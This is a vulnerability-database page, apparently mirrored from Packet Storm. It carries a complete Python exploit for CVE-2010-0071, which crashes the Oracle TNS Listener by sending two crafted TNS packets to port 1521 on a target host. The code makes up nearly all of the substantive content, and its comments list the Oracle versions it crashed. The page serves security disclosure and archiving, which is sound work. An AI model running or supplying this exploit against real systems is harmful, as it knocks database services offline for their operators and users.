Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Oracle TNS Listener Denial Of Service

🗓️ 22 Jan 2010 00:00:00Reported by Dennis YurichevType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 41 Views

Oracle TNS Listener Denial Of Service exploi

Related
Code
ReporterTitlePublishedViews
Family
Circl		CVE-2010-0071
12 Jan 201000:00
circl
CVE		CVE-2010-0071
13 Jan 201001:00
cve
Cvelist		CVE-2010-0071
13 Jan 201001:00
cvelist
Exploit DB		Oracle Database - Remote Listener Memory Corruption
12 Jan 201000:00
exploitdb
exploitpack		Oracle Database - Remote Listener Memory Corruption
12 Jan 201000:00
exploitpack
NVD		CVE-2010-0071
13 Jan 201001:30
nvd
Oracle		Oracle Critical Patch Update Advisory - January 2010
12 Jan 201000:00
oracle
Oracle		Security | Oracle Critical Patch Update - January 2010
12 Jan 201000:00
oracle
Tenable Nessus		Oracle Database Multiple Vulnerabilities (January 2010 CPU)
26 Apr 201000:00
nessus
Prion		Design/Logic Flaw
13 Jan 201001:30
prion
Rows per page
`# TNS Listener (Oracle RDBMS) exploit, cause Listener process crash  
  
# While running on 11.1.0.7.0 win32, nsglvcrt() Listener function attempt  
# to allocate huge memory block and copy *something* to it.  
  
# TID=3052|(1) MSVCR71.dll!malloc (0x4222fc5) (called from 0x438631 (TNSLSNR.EXE!nsglvcrt+0x95))  
# TID=3052|(1) MSVCR71.dll!malloc -> 0x2530020  
# TID=3052|(0) TNSLSNR.EXE!__intel_fast_memcpy (0x2530020, 0, 0x4222fc4) (called from 0x438647 (TNSLSNR.EXE!nsglvcrt+0xab))  
  
# (addresses are for TNS Listener 11.1.0.7.0 win32 unpatched)  
# If I correct, nsglvcrt() function is involved in new service creation.  
  
# Successfully crashed:  
# Oracle RDBMS 11.1.0.6.0 win32 with CPUapr2009 applied  
# Oracle RDBMS 11.1.0.7.0 win32 with CPUapr2009 applied  
# Oracle RDBMS 10.2.0.4 win32 with CPUapr2009 applied  
# Oracle RDBMS 10.2.0.2 Linux x86  
# Not crashed:  
# Oracle RDBMS 11.2 Linux x86  
  
# Vulnerability discovered by Dennis Yurichev <[email protected]>  
  
# Fixed in CPUjan2010 as CVE-2010-0071 (CVSS 10.0):  
# http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2010.html  
  
from sys import *  
from socket import *  
  
sockobj = socket(AF_INET, SOCK_STREAM)  
  
sockobj.connect ((argv[1], 1521))  
  
sockobj.send(  
"\x00\x68\x00\x00\x01\x00\x00\x00"  
"\x01\x3A\x01\x2C\x00\x00\x20\x00"  
"\x7F\xFF\xC6\x0E\x00\x00\x01\x00"  
"\x00\x2E\x00\x3A\x00\x00\x00\x00"  
"\x00\x00\x00\x00\x00\x00\x00\x00"  
"\x00\x00\x00\x00\x00\x00\x00\x00"  
"\x00\x00\x00\x00\x00\x00\x00\x00"  
"\x00\x00\x28\x43\x4F\x4E\x4E\x45"  
"\x43\x54\x5F\x44\x41\x54\x41\x3D"  
"\x28\x43\x4F\x4D\x4D\x41\x4E\x44"  
"\x3D\x73\x65\x72\x76\x69\x63\x65"  
"\x5F\x72\x65\x67\x69\x73\x74\x65"  
"\x72\x5F\x4E\x53\x47\x52\x29\x29"  
)  
  
data=sockobj.recv(102400)  
  
sockobj.send(  
"\x02\xDE\x00\x00\x06\x00\x00\x00"  
"\x00\x00\x00\x00\x02\xD4\x20\x08"  
"\xFF\x03\x01\x00\x12\x34\x34\x34"  
"\x34\x34\x78\x10\x10\x32\x10\x32"  
"\x10\x32\x10\x32\x10\x32\x54\x76"  
"\x00\x78\x10\x32\x54\x76\x44\x00"  
"\x00\x80\x02\x00\x00\x00\x00\x04"  
"\x00\x00\x70\xE4\xA5\x09\x90\x00"  
"\x23\x00\x00\x00\x42\x45\x43\x37"  
"\x36\x43\x32\x43\x43\x31\x33\x36"  
"\x2D\x35\x46\x39\x46\x2D\x45\x30"  
"\x33\x34\x2D\x30\x30\x30\x33\x42"  
"\x41\x31\x33\x37\x34\x42\x33\x03"  
"\x00\x65\x00\x01\x00\x01\x00\x00"  
"\x00\x00\x00\x00\x00\x00\x64\x02"  
"\x00\x80\x05\x00\x00\x00\x00\x04"  
"\x00\x00\x00\x00\x00\x00\x01\x00"  
"\x00\x00\x10\x00\x00\x00\x02\x00"  
"\x00\x00\x84\xC3\xCC\x07\x01\x00"  
"\x00\x00\x84\x2F\xA6\x09\x00\x00"  
"\x00\x00\x44\xA5\xA2\x09\x25\x98"  
"\x18\xE9\x28\x50\x4F\x28\xBB\xAC"  
"\x15\x56\x8E\x68\x1D\x6D\x05\x00"  
"\x00\x00\xFC\xA9\x36\x22\x0F\x00"  
"\x00\x00\x60\x30\xA6\x09\x0A\x00"  
"\x00\x00\x64\x00\x00\x00\x00\x00"  
"\x00\x00\xAA\x00\x00\x00\x00\x01"  
"\x00\x00\x17\x00\x00\x00\x78\xC3"  
"\xCC\x07\x6F\x72\x63\x6C\x00\x28"  
"\x48\x4F\x53\x54\x3D\x77\x69\x6E"  
"\x32\x30\x30\x33\x29\x00\x01\x00"  
"\x00\x00\x58\x00\x00\x00\x01\x00"  
"\x00\x00\x50\xC5\x2F\x22\x02\x00"  
"\x00\x00\x34\xC5\x2F\x22\x00\x00"  
"\x00\x00\x9C\xC5\xCC\x07\x6F\x72"  
"\x63\x6C\x5F\x58\x50\x54\x00\x09"  
"\x00\x00\x00\x50\xC5\x2F\x22\x04"  
"\x00\x00\x00\x00\x00\x00\x00\x00"  
"\x00\x00\x00\x00\x00\x00\x00\x34"  
"\xC5\xCC\x07\x6F\x72\x63\x6C\x5F"  
"\x58\x50\x54\x00\x01\x00\x00\x00"  
"\x05\x00\x00\x00\x01\x00\x00\x00"  
"\x84\xC5\x2F\x22\x02\x00\x00\x00"  
"\x68\xC5\x2F\x22\x00\x00\x00\x00"  
"\xA4\xA5\xA2\x09\x6F\x72\x63\x6C"  
"\x00\x05\x00\x00\x00\x84\xC5\x2F"  
"\x22\x04\x00\x00\x00\x00\x00\x00"  
"\x00\x00\x00\x00\x00\x00\x00\x00"  
"\x00\xFC\xC4\xCC\x07\x6F\x72\x63"  
"\x6C\x00\x01\x00\x00\x00\x10\x00"  
"\x00\x00\x02\x00\x00\x00\xBC\xC3"  
"\xCC\x07\x04\x00\x00\x00\xB0\x2F"  
"\xA6\x09\x00\x00\x00\x00\x00\x00"  
"\x00\x00\x89\xC0\xB1\xC3\x08\x1D"  
"\x46\x6D\xB6\xCF\xD1\xDD\x2C\xA7"  
"\x66\x6D\x0A\x00\x00\x00\x78\x2B"  
"\xBC\x04\x7F\x00\x00\x00\x64\xA7"  
"\xA2\x09\x0D\x00\x00\x00\x20\x2C"  
"\xBC\x04\x11\x00\x00\x00\x95\x00"  
"\x00\x00\x02\x20\x00\x80\x03\x00"  
"\x00\x00\x98\xC5\x2F\x22\x00\x00"  
"\x00\x00\x00\x00\x00\x00\x0A\x00"  
"\x00\x00\xB0\xC3\xCC\x07\x44\x45"  
"\x44\x49\x43\x41\x54\x45\x44\x00"  
"\x28\x41\x44\x44\x52\x45\x53\x53"  
"\x3D\x28\x50\x52\x4F\x54\x4F\x43"  
"\x4F\x4C\x3D\x42\x45\x51\x29\x28"  
"\x50\x52\x4F\x47\x52\x41\x4D\x3D"  
"\x43\x3A\x5C\x61\x70\x70\x5C\x41"  
"\x64\x6D\x69\x6E\x69\x73\x74\x72"  
"\x61\x74\x6F\x72\x5C\x70\x72\x6F"  
"\x64\x75\x63\x74\x5C\x31\x31\x2E"  
"\x31\x2E\x30\x5C\x64\x62\x5F\x31"  
"\x5C\x62\x69\x6E\x5C\x6F\x72\x61"  
"\x63\x6C\x65\x2E\x65\x78\x65\x29"  
"\x28\x41\x52\x47\x56\x30\x3D\x6F"  
"\x72\x61\x63\x6C\x65\x6F\x72\x63"  
"\x6C\x29\x28\x41\x52\x47\x53\x3D"  
"\x27\x28\x4C\x4F\x43\x41\x4C\x3D"  
"\x4E\x4F\x29\x27\x29\x29\x00\x4C"  
"\x4F\x43\x41\x4C\x20\x53\x45\x52"  
"\x56\x45\x52\x00\x68\xC5\x2F\x22"  
"\x34\xC5\x2F\x22\x00\x00\x00\x00"  
"\x05\x00\x00\x00\x84\xC5\x2F\x22"  
"\x04\x00\x00\x00\x00\x00\x00\x00"  
"\x00\x00\x00\x00\x00\x00\x00\x00"  
"\xFC\xC4\xCC\x07\x6F\x72\x63\x6C"  
"\x00\x09\x00\x00\x00\x50\xC5\x2F"  
"\x22\x04\x00\x00\x00\x00\x00\x00"  
"\x00\x00\x00\x00\x00\x00\x00\x00"  
"\x00\x34\xC5\xCC\x07\x6F\x72\x63"  
"\x6C\x5F\x58\x50\x54\x00"   
)  
  
sockobj.close()  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
22 Jan 2010 00:00Current
6.5Medium risk
Vulners AI Score6.5
EPSS0.12519
oracle rdbmstns listenerdenial of servicevulnerabilitycve-2010-0071cpujan2010oracle cpuapr2009
41